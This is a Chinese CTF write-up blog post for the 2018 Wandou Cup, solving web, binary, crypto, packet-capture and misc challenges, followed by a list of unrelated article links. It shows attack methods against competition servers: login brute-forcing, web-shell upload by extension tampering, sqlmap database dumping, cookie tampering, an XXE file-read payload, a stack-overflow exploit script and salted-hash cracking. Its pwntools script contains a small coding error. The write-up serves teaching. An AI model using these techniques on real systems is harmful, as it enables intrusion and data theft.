2018年首届豌豆杯WriteUp_f09ebdb2bb9f5eb4fbd12aad96e1e929 p5zg6ltd-程序员宅基地

技术标签: 安全  CTF  豌豆杯  WriteUp  

由于比赛结束服务器关闭,所以赛后无法实现复现,造成writeup的可读性不强勿怪。

WEB安全

1.web签到题(100)
hint:请选手访问 http://101.231.137.47:20001/,获取flag。

很明显链接点进去,滑稽,很多很多滑稽,既然是签到题,先F12查看页面源代码即可找到flag。

2.输入密码查看flag(100)
hint:请选手访问 http://101.231.137.47:20002/4.php ,输入密码就可查看flag哦。

访问网址,进去是一个登录界面,需要输入查看密码才能查看,然后输入密码的下方有提示说密码是五位数,既然是五位数,尝试用burpsuite抓包进行爆破咯。设置payload

爆破即可得到密码:12138(没记错的话)登录进去就可以得到flag。

3.这真能传马?(100)
hint:小明这个大黑客这两天在做坏事想请您帮忙,请选手访问 http://101.231.137.47:20003 ,看看能不能传个马获取/opt/flag.txt中内容呢?flag为32位小写md5。

点进链接,发现是一个上传文件的页面,上面写着Upload yourPhotos to Dir猜测是对上传的文件类型进行的限制只能传图片。然后尝试着上传一个图片然后抓包试试,发现它POST了一个参数,值是图片的后缀名(例如jpg,gif等),我再尝试着上传一个大马.jpg,抓包改文件名为.php并在那个参数后面加上php的后缀,就可以成功上传,然后就简单了,直接去/opt/flag.txt拿flag。

4.这真的能注入?(100)
hint:小明这个大黑客这两天在做坏事想请您帮忙,请选手访问 http://101.231.137.47:20004 ,通过某种奇怪的Web攻击技术获取数据库中的flag值。flag为32位小写md5。

点击链接,发现是一个表,url里有一个gid的参数,尝试着改参数的值,表的内容也会发生变化,外加题目就提示注入,直接sqlmap跑起来,爆库,爆表,爆列名,dump下来直接get到flag。

5.怎么拿webshell(200)
hint:公司好像有个服务器被黑了,攻击者关闭了远程登录,请选手访问 http://101.231.137.47:20005 ,看看能不能拿到webshell获取/opt/flag.txt中内容呢?flag为32位小写md5。

题目说服务器被黑了,攻击者关闭了远程登录,扫描工具扫到有一个/hack.php的页面,是个登录页面,尝试burpsuite字典爆破,密码:1qaz2wsx ,登入发现是个可以读取文件内容的页面,直接去/opt/flag.txt获取flag。

6.APi(200)
hint:这里好像有个什么api,链接在此http://10.10.10.199:20006/index ,能用它获取/tmp/flag.txt中内容吗?Flag包含大小写和符号噢

api调用,点击链接,查看源码,尝试着输入一个值然后抓包,发现它并没有将我输入的内容发送到服务器,而是发送了几个特定的值。猜测是XXE漏洞(xxe也就是xml外部实体注入 )读取flag.txt。因为它是以json格式传递,所以我先将Content-Type的值为application/xml,然后我恶意的引用了外部实体,将它的值绑定为服务器的/tmp/flag.txt,这样在服务器返回给我们解析后的值时,就会把/tmp/flag.txt的内容返回给我们。

XML内容:

<?xml version="1.0"?>
<!DOCTYPE a[
<!ENTITY b SYSTEM "file:///tmp/flag.txt">]>
<c>&b;</c>
8.Atom[附加题] (100)
hint:您觉得这个网站华丽吗?或许您可以获权搞点新鲜的~
地址:http://101.231.137.47:20008/login.php
账户:test,密码:123456

这个附加题给的是一个登录页面,题目说获权,猜测是要以admin的身份登录,抓包,发现cookie中有一个admin的参数值为0,改成1就可以查看页面源码找到flag。

远程漏洞利用

2.远程攻击-2(100)
hint:请选手下载文件100,通过某种攻击技术获取flag文件中的内容。IP:101.231.137.47,端口:20011。
下载地址:

先file命令看看

100: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=7d83faff7b0a4f6c760446a51f736a4cb63ffe69, not stripped

GDB走一波

CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

然后IDA看看

比较初级的栈溢出了

起始地址为0xffffd140 ret的地址为0xffffd18c

所以只要输入76个字符,然后附上readflag函数的地址即可

from pwn import *
p = process("101.231.137.47",20011)
payload = 'm'*76 + p32(0x8048471)
p.sendline(payload)
p.interactive()

加密解密

1.我这密码忘了。。。(100)
hint:小明记性不好这密码忘了,只记得密码和下面这串字符是有关系的,请选手分析下列字符串帮助小明找回密码。VTBzNE9GZEhURWhDVjBveFVrMVVTell4UkRKWU5FTTFRMGszUmtrd1ZFVT0=
Flag为32位大写md5

题目给了一串base64,解码得U0s4OFdHTEhCV0oxUk1USzYxRDJYNEM1Q0k3RkkwVEU=发现还是base64,再解密就可以得到flag:SK88WGLHBWJ1RMTK61D2X4C5CI7FI0TE

2.二战时期的密码(100)
hint:已知将一个flag以一种加密形式为使用密钥进行加密,使用密钥WELCOMETOCFF加密后密文为000000000000000000000000000000000000000000000000000101110000110001000000101000000001,请分析出flag。Flag为12位大写字母

给了一个长度为84位的二进制数,并给了秘钥WELCOMETOCFF长度是12,所以猜测是ascii的二进制值七位异或

秘钥                   密文           明文
W=0010111            0000000        0010111=W
E=0000101            0000000        0000101=E
L=0001100            0000000        0001100=L
C=0000011            0000000        0000011=C
O=0001111            0000000        0001111=O
M=0001101            0000000        0001101=M
E=0000101            0000000        0000101=E
T=0010100            0010111        0000011=C
O=0001111            0000110        0001001=I
C=0000011            0010000        0010011=S
F=0000110            0010100        0010010=R
F=0000110            0000001        0000111=G

就可以获得flag了。

3.被黑了,求密码(100)
hint:小明记性不好这密码忘了,只记得密码和下面这串字符是有关系的  .--- .-. --.- ----- ..... ---.. -..- -- --. -.-. .---- .. --... .--. -... ....- ..- -. --. .- --... -... .-.. -. -... -.-. -- ... -.... -.-- .--- ----- 请选手分析下列字符串帮助小明找回密码。Flag为32位大写md5

-.组成的很明显就是摩斯密码,摩斯密码解码

然后大写就可以:JRQ058XMGC1I7PB4UNGA7BLNBCMS6YJ0

4.出航了~出航了!!(200)
hint:Hey! 各位船员们抓紧时间上船吧,我们的船马上就要开了。在出发前我会给你们一个指导手册(data.pcap),指导手册里会有你们在本次航行中需要的通行证。我在这里啰嗦一下:大家可以利用通行证里的request(请求)信息进行分析。祝各位能在旅途中获得本次flag!

给了一个数据包,提示利用request(请求)分析,用wireshark过滤器过滤http.request.method=="POST"就可以看到只有一个包,点击查看发现是用户名和密码

将密码base64解密得flag:KN1Z6PXVy9

1540779982838

5.IDC密码破解(200)
hint:小明是某互联网企业的一名IDC管理员,由于该企业的业务复杂,机器众多,为了方便日常的管理工作,小明使用一种加密算法来加密密码然后放在一个excel中,方便日常的工作,.现在从小明的excel中抽取一条密码.请参赛选手下载压缩包 passwd-300.rar,破解压缩包中txt文档的加密密码并提交。

给了一个txt文本,里面是

纯脑洞,js反过来就是sj(手机),然后手机拼音9键,4163633181327481,例如41就是第四个按键的第一个字母g等,然后flag就出来啦。

6.超级密码(300)
hint:某遗留系统采用固定格式+6-10位数字类型密码,今天他们发生了数据泄露事件,做为一名黑客,你要开始干活了。
请下载附件password进行破解。

下载了附件用notepad++打开发现好多的md5值和字符串,所以猜测就是hash加密并为密码加盐了(Salt)。

即便是将原始密码加密后的哈希值存储在数据库中依然是不够安全的,因为可以通过查表法破解hash值。那么有什么好的办法来解决这个问题呢?答案是加盐。
盐(Salt)是什么?就是一个随机生成的字符串。我们将盐与原始密码连接(concat)在一起(放在前面或后面都可以),然后将concat后的字符串加密。采用这种方式加密密码,查表法就不灵了(因为盐是随机生成的)

直接放脚本爆破

# -*- coding: utf-8 -*-
import hashlib
result ="{FLAG:%number}%salt"
password =["f09ebdb2bb9f5eb4fbd12aad96e1e929.p5Zg6LtD","6cea25448314ddb70d98708553fc0928.ZwbWnG0j","2629906b029983a7c524114c2dd9cc36.1JE25XOn","2e854eb55586dc58e6758cfed62dd865.ICKTxe5j","7b073411ee21fcaf177972c1a644f403.0wdRCo1W","6795d1be7c63f30935273d9eb32c73e3.EuMN5GaH","d10f5340214309e3cfc00bbc7a2fa718.aOrND9AB","8e0dc02301debcc965ee04c7f5b5188b.uQg6JMcx","4fec71840818d02f0603440466a892c9.XY5QnHmU","ee8f46142f3b5d973a01079f7b47e81c.zMVNlHOr","e4d9e1e85f3880aedb7264054acd1896.TqRhn1Yp","0fd046d8ecddefc66203f6539cac486b.AR5lI2He","f6326f02adaa31a66ed06ceab2948d01.Aax2fIPl","720ba10d446a337d79f1da8926835a49.ZAOYDPR2","06af8bcc454229fe5ca09567a9071e62.hvcECKYs","79f58ca7a81ae2775c2c2b73beff8644.TgFacoR3","46aaa5a7fef5e250a2448a8d1257e9cf.GLYu0NO4","2149ac87790dd0fe1b43f40d527e425a.5Xk2O1sG","d15a36d8be574ac8fe64689c728c268e.aZikhUEy","ff7bced91bd9067834e3ad14cc1464cd.E7UROqXn","8cc0437187caf10e5eda345cb6296252.XPin3mVB","5cfcdca4a9cb2985a0b688406617689e.nsGqoafv","5a7dfa8bc7b5dfbb914c0a78ab2760c6.YC1qZUFR","8061d8f222167fcc66569f6261ddd3cc.wNgQi615","3d8a02528c949df7405f0b48afe4a626.CO2NMusb","70651acbc8bd027529bbcccdbf3b0f14.CAXVjFMd","a9dbe70e83596f2d9210970236bdd535.TL6sjEuK","9ed6ef5780f705ade6845b9ef349eb8f.tJ90ibsz","4b46fac0c41b0c6244523612a6c7ac4a.VTjOSNmw","8141e6ecb4f803426d1db8fbeb5686ef.lh75cdNC","df803949fd13f5f7d7dd8457a673104b.V39sEvYX","19052cc5ef69f90094753c2b3bbcd41d.YwoGExpg","cf8591bdccfaa0cdca652f1d31dbd70f.pJCLui49","66e10e3d4a788c335282f42b92c760a1.NQCZoIhj","94c3ae5bcc04c38053106916f9b99bda.vOktelLQ","e67e88646758e465697c15b1ef164a8d.x0hwJGHj","84d3d828e1a0c14b5b095bedc23269fb.2HVWe9fM","264a9e831c3401c38021ba3844479c3f.Cx4og6IW","ed0343dec184d9d2c30a9b9c1c308356.g2rqmPkT","ad5ba8dc801c37037350578630783d80.pFK2JDT5","3f588bedb704da9448e68fe81e42bca6.4ANDOiau","970c9cf3cad3dfa7926f53ccaae89421.R6ML7Qy8","e0a097b7cceaa7a8949fe039884e4a2d.dul2ynqL","7df505218102c64b1fe4fa5981ddb6fa.jPeoyS57","fd4f6043da1f7d5dca993c946ef6cd7c.6p9CwGaY","5fe6d99b9a2824949279187c246c9c30.OGQ2J57y","135b150ad513a961089bb1c05085a3d9.h0dw1Fro","ad6af4fb623b3c51181a371911667fed.HbQT4dRz","c9fa4b0db317d88e2b10060225e92494.ebVnpMzS","d0deab17d115bd6fdce8592bb3667643.bL5zwgvX","006f0cb3a422716692f143f28eb0d187.NHXg1Fof","ddc125de34da1a6ec0cbe401f147bc8f.GDai9Y0n","be5052053c5a806e8f56ed64e0d67821.40alyH3w","aaf18ac446b8c385c4112c10ae87e7dc.ZJQzuIL0","a2db20a4b7386dc2d8c30bf9a05ceef7.QnpOlPWH","8a4fbc32a3251bb51072d51969ba5d33.rtcbipeq","5e35d2c9675ed811880cea01f268e00f.i1Hbne6h","9da23007699e832f4e9344057c5e0bd3.EtbGpMSW","f09233683d05171420f963fc92764e84.fxHoinEe","4feabf309c5872f3cca7295b3577f2a8.KymkJXqA","9b94da2fa9402a3fdb4ff15b9f3ba4d2.G3Tdr1Pg","b3cd8d6b53702d733ba515dec1d770c5.Y71LJWZz","6a5b3b2526bb7e94209c487585034534.rIwb4oxt","e9728ef776144c25ba0155a0faab2526.e1sOXSb8","d41a5e7a98e28d76dbd183df7e3bcb49.36bedvia","81d5ebfea6aff129cf515d4e0e5f8360.dDG4qTjW"]
n=1000000000
while(n<10000000000):
    for j in range(0,66):
        salt = password[j][33:]
        md5 = password[j][:32]
        mingwen = "{FLAG:"+str(n)+"}"+password[j][33:]
        miwen = hashlib.md5(mingwen.encode('utf-8')).hexdigest()
        if (miwen == md5) :
            print(mingwen)
            print(password[j])
            n=10000000000
            break
    print(n)
    n=n+1
	

运行脚本

网络协议分析

1.数据包里有甜甜圈哦~(100)
hint:老板给我来982份甜甜圈!
哈?我这里可没有这么多甜甜圈,但我这里有982份的酸奶麦片。
Deal!(成交!)

酸奶麦片!!!(snmp),直接wireshark过滤器过滤udp contains"flag"

随便选取一个追踪udp流就可以看到flag。

3.我是没有感情的thief(300)
hint:我是Sam,我在船上偷了船长的一封信,但是这封信被加密了,我能力有限无法解密还请各位大佬们帮帮我解密下这封密信,必有重谢!
为了能够更快更有效的解密,我将我知道的信息告诉您们。

这封密信flag位置为 CTF%xXxxXx% (区分大小写!)
例如 CTF%sdfg7sup1erg6s6NCo8fgh4dg5%,提交内容为sdfg7sup1erg6s6NCo8fgh4dg5

打开数据包,发现大部分都是802.11也就是无线网的数据包,我们过滤http,发现一个get方式请求的rom-0的文件,通过导出http对象分析来提取这个rom-0文件,然后搜索“Decrypt Rom-0”会带你到routerpwn ,在那里你可以上传rom-0文件并解压缩它,因为它是一个Rom-0配置解压缩器(LZS)。

这提供了sp.data内容,其中包含wireshark无线捕获的WPA密码。

Rome4040
TP-LINK
public
public
public
public

在编辑 - >首选项 - >协议 - > IEEE 802.11 - >解密密钥 - >新建 - > WPA-PWD中为wireshark提供“Rome4040”并应用它将解密WiFi会话。

然后再过滤http contains"CTF%"

然后追踪一下tcp流得到flag。

杂项

1.会飞的狗狗(100)
hint:最近公司截获了一个犯罪份子传播信息的文件,请下载 corgi-can-fly 分析该文件中的内容,flag为英文字符串,包含符号和空格符,提交时请注意。下载地址:http://101.231.137.47:8899/corgi-can-fly.jpg

直接notepad++打开滑到最后有个base64编码的字符串

base64解码后是Did you tried LSB?,所以用StegSolve打开

用QR Research扫一下就可以得到flag。

2.文件类型分析(100)
hint:请选手下载文件,分析其文件类型。下载地址:http://101.231.137.47:8899/84E726A733B63EBC7ABD3DC5F5967DC8

给了一个压缩包,点开看

有一个xml和一个后缀是fdseq的文件,百度一下,说是XPS,试了发现就是flag

3.真真假假分不清楚(200)
hint:请下载文件hahaha.zip分析获取flag。下载地址:http://101.231.137.47:8899/hahaha.zip

压缩包打开发现要密码,放010editor里发现是伪加密,修改全局标志位将01改成00就可以解压打开获得flag。

4.诱人的音乐(200)
hint:玩累啦?那么听点音乐吧!您觉得这份歌单如何呢?
URL:https://music.163.com/#/playlist?id=2473353630&userid=77195412
我觉得下面这首歌比那歌单更有feel!
http://101.231.137.47:8899/PPAP.wav

音频隐写,用audacity打开,发现从9.50左右开始有摩斯电码,将其用二进制写下来为

01100110=f 
01101100=l
01100001=a
01100111=g
01111011={
01100011=c
01101000=h
00110001=1
01110000=p
01110100=t
01110101=u
01101110=n
01100101=e
01011111=_
00110101=5
00110011=3
01110110=v
01100101=e
01110010=r
01111101=}
5.神秘的文件名(300)
hint:小明某天下载了 mobile.tar.gz压缩包,将代码进行修改后发现了神奇的东西请选手分析并获取flag。flag形式为8位小写字母。下载地址:http://101.231.137.47:8899/mobile.tar.gz

解压得到CTF_300放到IDA里找到main函数,f5转伪C代码,然后很明显看到要想得到flag先得通过sub_C14函数判断

而byte_4008首先要通过sub_A30进行异或操作

并且进到sub_C14函数可以看到

初始值v3等于7,通过判断v2的值来跳转到LABEL_26。

而LABEL_26通过sub_EAC来改变v3的值。所以8次验证正好修改v3的值得到8位的flag。通过思考地推得出v3

7   1   3   6   5   9   4   2

再加上输入为0,放脚本

a=[105,115,101,110,103,97,114,100]
b=[i^1 for i in a]
c=[b[i]^i for i in range(len(b))]
d=[a[i]^i for i in range(len(a))]
s1=''
s2=''
s3=''
s4=''
for i in range(len(a)):
    s1+=chr(a[i])
    s2+=chr(b[i])
    s3+=chr(c[i])
    s4+=chr(d[i])
print(s1)
print(s2)
print(s3)
print(s4)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Super_Yiang/article/details/83506186

智能推荐

汽车行业常见术语英文缩写(持续更新...)_汽车专业术语缩写-程序员宅基地

文章浏览阅读2.3k次,点赞2次,收藏18次。序号缩写中文英文1ABS防抱死制动系统Anti-lock Braking System2EVAP蒸发排放系统Evaporative Emission System3EGR废气再循环Exhaust Gas Recirculation4ESIM蒸发系统完整性监测Evapor System Integraty Monitor5EPB电子驻车制动系统Electrical Park Brake6EBD电子制动力分配Electro..._汽车专业术语缩写

寻找...-程序员宅基地

文章浏览阅读280次。菜鸟程序员寻找人教我会很虚心学习的希望有人愿意教我

opencv cv2.imread()报错: error: (-215:Assertion failed) !_src.empty() in function ‘cv::cvtColor‘_cv2.error: opencv(4.7.0) /io/opencv/modules/imgpro-程序员宅基地

文章浏览阅读2.2k次,点赞2次,收藏3次。v2.error: OpenCV(4.7.0) D:\a\opencv-python\opencv-python\opencv\modules\imgproc\src\color.cpp:182: error: (-215:Assertion failed) !_src.empty() in function 'cv::cvtColor'_cv2.error: opencv(4.7.0) /io/opencv/modules/imgproc/src/color.cpp:182: error

推荐Windows电脑上最好用的3个mobi阅读器-程序员宅基地

文章浏览阅读9.3k次。mobi格式之所以流行,主要是源于亚马逊官网的电子书格式以及Kindle,但由于存在较多缺陷逐渐被azw3格式替代,mobi格式的文件无法直接用电脑打开,需要阅读器才能打开阅读。今天小编就为大家推荐3个在Windows电脑上最好用的mobi阅读器。第一款: neat reader neat reader是一款跨平台阅读器,可以支持azw3/azw/mobi/epub/pdf/txt等常见文档格式,也同时支持在Windows/Mac/Android/iOS系统上使用。 neat reader阅读..

生活经验_生活经验博客-程序员宅基地

文章浏览阅读212次。坚持原则1、背后不议论他人是非,拒绝人身攻击。2、坚持宁缺毋滥原则,重要事情坚决不将就或迁就。3、抵制诱惑,坚决不为新奇而体验令人上瘾的不好事物。4、坚持独立思考,明辨是非,科学评判,拒绝听风就是雨,跟风,为舆论绑架。5、若想人不知,除非己莫为。方法论1、做事讲究成本:包括经济成本,时间成本,体能成本。譬如在一下破解应用上,往往找破解方法会花费大量的时间成本,破解应用,往往也可能..._生活经验博客

RK3399平台入门到精通系列讲解 - 总目录_rk3399平台开发系列讲解(内核入门篇)1.20、container_of 获取结构体首地址原理-程序员宅基地

文章浏览阅读8.7w次,点赞261次,收藏1.1k次。欢迎大家来到内核笔记的《RK3399平台开发入门到精通系列讲解》,开始前博主先列出RK3399平台学习的大纲,同时这也可以作为大家学习RK3399内核与安卓框架的参考。下面蓝字都是传送门,点击进入即可:..._rk3399平台开发系列讲解(内核入门篇)1.20、container_of 获取结构体首地址原理

随便推点

字节跳动高频100道核心前端面试题解析-程序员宅基地

文章浏览阅读3.4k次。字节跳动的前端一直是大热之选,薪资和技术都是国内的最前沿。本文将为大家简单介绍一下字节技术岗的职级体系和相应的技术要求。并给大家分享一套高质量面试题:「由字节资深前端大佬整理的100道高频..._字节跳动前端面试题

HTML-Emmet(神器)_html 神器-程序员宅基地

文章浏览阅读709次。使用Emmet必须先安装插件,我用atom 安装插件翻墙什么的我就不写了 在这里我推荐两个学习emmet语法的网页 日常链接嘻嘻 前人总结的emmet语法使用,有动态图演示,新手推荐 官方语法_html 神器

Zigbee入门概念及背景知识_zigbee背景-程序员宅基地

文章浏览阅读700次。在学习Zigbee之前,需要了解与单片机学习的方法不同之处以及难点所在。学习Zigbee需要掌握协议栈和网络等相关知识,任务量较大。Zigbee的资料相对较少,初学者学习起来比较费劲,学习效果不理想。学习过程中需要利用软件和硬件工具,提高学习效率。Zigbee是一种无线通信方式,用于构建无线局域网,可以用于家居、工业、矿产、农业、医疗等领域。相比蓝牙和WIFI,Zigbee可以组建大规模网络,功耗低,但通信速率较小。Zigbee和以太网组网技术有所不同,用途、拓扑结构和通信特性等方面存在差异。Zigbee的_zigbee背景

HTTP中的GET和POST方法详解_http post get-程序员宅基地

文章浏览阅读1.4w次,点赞18次,收藏100次。一般来说GET是获取数据,POST是提交数据的。但是因为GET和POST都是HTTP的方法,HTTP又是是基于TCP/IP的关于数据在万维网中如何让通讯的协议。从本质上讲,GET和POST都是HTTP请求,都是TCP链接,是无区别的。但是HTTP协议既然有了这两个方法,就是为了在特定的情况下区分应用。1、GET是获取数据,POST是提交数据的。GET方法通常用于请求服务器发送某个资源,而且应该是安全的和幂等的。仅仅是获取资源信息,就像数据库查询一样,不会修改和增加数据,不会影响资源的状态。POST_http post get

初识 MongoDB_本关任务:根据编程要求启动 mongodb 服务。-程序员宅基地

文章浏览阅读2.6k次,点赞3次,收藏28次。第1关:启动 MongoDB本关任务:根据编程要求启动 MongoDB 服务。第2关:启动 MongoDB 多实例本关任务:根据第一关单实例(服务)的启动教程,按照编程要求,启动两组实例(服务)。第3关:退出客户端和关闭 MongoDB 服务本关任务:关闭端口为27017的 MongoDB 服务。标题..._本关任务:根据编程要求启动 mongodb 服务。

ClusterStorage-236-4-客户端配置挂载与授权控制(ACL&Quota)_acl_enable 和 quota-程序员宅基地

文章浏览阅读225次。0.实验环境图1.客户端配置挂载在workstation上,安装glusterfs文件客户端,创建挂载目录,编辑挂载配置文件,进行挂载,查看文件系统。[root@workstation ~]# yum install -y glusterfs-fuse[root@workstation ~]# mkdir /test[root@workstation ~]# mkdir ..._acl_enable 和 quota

推荐文章

热门文章

相关标签